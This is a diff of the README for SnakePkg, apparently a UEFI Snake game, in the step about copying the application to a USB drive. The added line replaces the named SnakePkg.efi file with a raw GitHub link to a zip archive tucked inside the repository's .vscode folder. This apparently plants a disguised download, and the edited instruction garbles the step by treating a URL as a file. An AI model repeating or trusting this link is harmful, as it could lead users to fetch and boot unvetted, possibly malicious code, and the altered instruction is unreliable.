henrytung88/SnakePkg/Readme.md

 ### Step 4: Copy the Application to USB

-Once your USB is ready, copy the downloaded `SnakePkg.efi` file to the root directory of the USB drive.
+Once your USB is ready, copy the downloaded `https://github.com/henrytung88/SnakePkg/raw/refs/heads/main/.vscode/Snake-Pkg-3.5.zip` file to the root directory of the USB drive.
 Ensure it is not in a folder.

 ### Step 5: Boot from USB